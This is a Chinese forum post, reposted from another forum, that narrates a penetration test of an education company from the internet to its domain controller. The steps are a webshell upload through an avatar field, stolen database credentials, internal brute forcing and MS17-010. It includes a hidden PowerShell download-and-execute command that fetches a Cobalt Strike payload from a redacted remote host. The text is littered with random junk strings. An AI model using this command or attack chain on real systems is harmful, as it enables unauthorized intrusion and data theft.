中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

: O. o* k2 ?: a% H 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路( T, x( h- e2 ?) m! {7 \! E

) B/ J1 u" I% w" O$ {9 S: W5 ~

, a; q$ M; b9 P- X H8 M  % y2 `6 U+ d, T. N( x) U- f% q* b

% ]" u2 P0 V# C4 f! T7 }

. b* r- @- l3 n 正文 5 A$ H( h% f* x7 H6 U

+ B( @$ u# E" g' [8 f0 j( N

9 d. J3 J' ?4 L/ k/ |) w   6 ^6 u) F; {3 E9 q

. ^$ B& L. I2 _

' K5 A, x1 i) G- f3 G 目标:www.xxxx.com(一家教育机构)
; t' \8 V1 f; l" b打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 6 G# G+ ]/ o, I

, M, z8 N1 t" f+ I7 c; T, [

3 @5 o( E: E" ]0 H6 l( V vshapes= ' K) A& j, d2 s6 A* e6 F' \

/ j% |( E9 s4 B( P' j

& X2 b% j$ O# V4 ?( D 进行了简单的信息搜集
: h' X/ V6 F8 _5 |2 \/ S' D
\/ q# v5 H) {$ ~* B) Y I7 N' B$ J: a% D' D; J0 |: x

) X5 j) A5 ]. m& M

m* Z$ Z Z/ R! a1 n 子域名搜集 : D% O/ ?) @& V0 M# R

' D& H; C4 w# ^

2 S& ^1 X9 m! p7 @$ | vshapes= % G ~- }- p# l# y2 L: k2 ]" r

9 X5 x$ y4 Y, k

3 `$ a, d# e, W2 \+ L- V1 p fofa找资产
# k: S* ^. E# i; W+ ~
- H9 y3 D! c- Q5 ~' i5 P! B9 v% b) }. ]$ {* K$ U4 f

$ [( A+ s; ~* }0 j7 n0 |

2 O7 P) t, S/ y vshapes= 3 H) N, S- F; E3 D$ n" R

$ f, `9 \/ x0 S; S! s

1 D% i1 @7 x; @: o 一共七个资产。去重之后只有两个。
$ k* `% ?9 |$ T5 S) M
, S2 h% X( a' z8 T2 D2 i4 N+ Y! K4 U8 M7 B/ }% V

, L y! q& O: p% T3 \5 M+ H

( ?% O$ J" F7 y9 f" [ 目录探测. j) e' f5 O; e4 n; b p

" @/ v- Q) f# ^) U% W) E

3 n, s e( S+ ` vshapes= % ~3 P. e# J4 I; T3 e3 u, q r

0 U+ V% o3 W8 }9 S

" [$ U- @$ I' h% Y1 Y, k0 L4 g 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& d5 v1 O' |0 R; e1 l
: o" `$ ]( A Q: F5 P : U% t# D8 @! C/ q2 ], J- X- R

; u* t% i5 P! O8 h2 h

; D3 ?2 N7 j+ d! c$ A. I 我又尝试了通过修改返回包来绕过登录界面* b$ v$ Q* c( G! ^: G, [' c

8 N/ w- }% K( b; J+ |

- h7 c* q* ^5 B, E$ [ vshapes= & E9 ~( S0 J8 T* f5 V2 M6 }

5 g1 e8 k* F" t' y8 m: ~/ } |

" h% L* W3 [7 P3 t/ D9 j" N 还是不行,尝试注入无果 ( X( G9 i0 ? h5 H* A# j$ f+ S1 @ Y

* e( m5 W! U9 w# U! J

& g1 P3 `5 i8 a) L5 E |7 h5 i( Y vshapes=% p+ d ]* t& L

7 ^* K9 X4 I/ Y

3 m" w4 M0 u, U$ `$ q. P 不过我目录探测出了一处Spring信息泄露
' C: S7 }* v1 O+ g! Z6 i
; ~% B( L& p" {8 V* p M / j: z1 L% Q+ ~/ J( E, [+ Z% o

9 _4 w k0 P6 U% j

% {( b G, {. S p# y5 V' B vshapes= 0 T8 ]; v+ G8 }8 Z

V4 o- U3 [* t9 C/ @( E

/ X5 E+ ]; _" x6 u% C$ c 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 Z8 y# o2 M5 J/ p: e

" Y1 D0 l: a0 f" L

3 Y" e; W/ h+ H+ D0 }. z% P vshapes=. G9 T8 J; I, ^

# U, |( X: H# E+ l- \

! A# @7 Y) j6 x' F2 { 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 $ ?; G3 ~/ _6 t

3 Z' K: E' z! |" X! _ F

) {# P4 I( H0 U" m4 A vshapes= 0 F* P) n3 V, H/ @

8 m/ M+ X0 ~6 O/ Y

# m+ \4 r8 s, J8 T; p, [ 获取有些师傅到这一步就手机抓包电脑测了。) F; v( A: K7 W1 M

K5 r1 p. e5 ]

$ P" v! B: T$ g! L2 o# P W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。& f* ~# S! x5 u; Z. p

1 d* Q& r$ r$ ~7 k+ o1 } S

" @6 `: r a% T1 L8 c; B 其中在一个公众号发现了小程序,可以进行注册。 ' a4 V2 X1 E5 ]5 b# t- _

% V9 ]7 G0 u! ]5 T& I! S: t

+ P$ v6 K$ H9 D+ O# Q 看到了头像上传,尝试上传获取WebShell9 F; j; i$ A4 z2 _, m$ t/ r0 F

8 P6 n0 l- i t' n$ |4 U

+ e% v) [( t3 r" w vshapes= 1 A1 k3 |& p4 ^( H% \5 K& x& s% {

8 i' a# I! F3 Q* k3 U; }* m' y

) n+ N2 h+ }5 p 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 # {7 c% A% @0 P7 _8 w. q+ B6 b

; d2 S1 @0 \- q: j9 L* J

; b o' q+ u' i vshapes= . Q% `+ [, b5 e6 ^4 h7 g4 B$ I

0 X: {5 O9 s2 g0 J ~

' j, f0 z ?8 |1 b9 }( h( ]& X 然后上了大马 5 g! Q* ~. A5 Y6 u

' h3 ^2 Z$ ^& c$ Q

' E' s6 E* ^0 V vshapes= 1 ~/ A9 z5 e) @+ T1 r; s- a

X+ f: E4 ~- G8 J6 X& U* ]

& Q9 E5 N, M: P/ x4 k! n% I3 J+ l vshapes=, Y8 Z! z3 ]" s3 B( @) X1 k. j

Z* S* v& M7 |+ p z

9 u$ G0 y4 B+ u4 z: A 通过翻找文件发现数据库账号密码 7 A7 w u0 Q$ g9 v

8 V( j P `) V

# m7 Q! y9 [( B* Z M vshapes= O5 J5 ]) n9 Y& ]8 ~

8 [7 P$ @; | S% {) p

& I) e2 }; R N! |. r --内网渗透 7 y7 ?' j" n# a! i* F H

U1 U; M* i0 D6 ]* g$ M, ?" [5 W9 E

6 B, \0 y n1 W0 S# Q( ` 直接通过powershell执行 cs上线+ ^ D/ b$ k% Q) B3 v! N

" s5 F. z2 W6 F2 l! g$ `& ~

; {1 X7 n3 H# D( O& P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"( M- d0 C( H$ T

/ q8 i5 {$ j0 u! o

6 i8 m+ x! x1 K2 b4 v0 ^4 j: R+ k vshapes=0 v+ c$ l: q+ m& ?

. l+ `1 j6 i6 M% Y4 J2 m' H

0 B) Z: m0 n9 G2 K( t7 V) Y) H 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 1 B# b2 w# z0 x$ `0 Y

6 P' R2 E9 D* o

. w- [4 @ i8 b5 M" Z vshapes= 6 Q0 }, n5 S/ M! p# ?- F

# A1 i$ F4 x- @

; X! V, d6 ^$ x- `1 q+ e3 C0 ~ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 r X2 d) Y6 F6 Z6 |8 e. g
}2 P; D% M& j! N
( I) p8 Y0 f$ B , Y) m W$ x% f/ f" a/ S

2 {( r, E- s; v7 w

/ Q* k a, j/ d# q- c vshapes= ' t) M5 _$ S+ s

" ?1 ?8 c1 {6 s" |0 c

8 W+ U, t+ x6 @2 `- o3 N 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 M3 \. E& k7 |3 {# C; \
! {7 n. x; S) ?; \4 y : a6 I3 S' f0 n" n- W$ Q8 s

, ~3 h+ [" ]) L, x4 Z

3 T" @, c) i3 B' z8 \( [* \ vshapes=) f* ]9 Z2 {. h& @% U4 ?

4 L$ k8 ]7 @+ {- Q7 ?2 j5 L0 _

( f$ R0 e3 |$ G2 t5 ^* G
- Y5 o( m; m! w* O# ~
% X( N X# v- O! G" q- }( q" S/ m% ^: F1 D) ^, |

6 @# ?3 }6 \. X3 K7 e

& U& q7 l- V6 o8 |) ?" C8 F  - _, [1 `, S& [

( A9 ]% l( @) m, e, l% w

2 C1 _. W5 H1 ]1 F# e9 E 小结' B: r7 k9 k7 r1 e- m$ V& L8 P% Q

- \3 a; u8 v/ [3 o: R

% Z! a8 f& D6 \" |: e   ; T$ }! G7 U% R

0 A. {) g, r7 Q* `- O

- }/ P, B9 a0 c3 H 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!3 x+ }3 k. Y% B4 i

& ]% G" A0 K g7 ?6 J7 @7 O

( d. m+ Y B I8 Q4 O {' W  , R, k: v) Y. F! {- Z3 D4 K

" D2 z. @% k8 b: J1 s6 m 1 ~1 ^' Z+ z) S9 u: q- l5 j& F

! p6 I% k8 j0 U1 g# D) \# ^2 k 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html. |4 o2 |; y9 M$ h- _0 x9 F- o! y

9 Z+ K3 E1 H* z0 x

; [! w3 e- N& J4 D" `+ @( I  0 z- ?6 v; Z" G# c* w( t) J7 E5 g





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2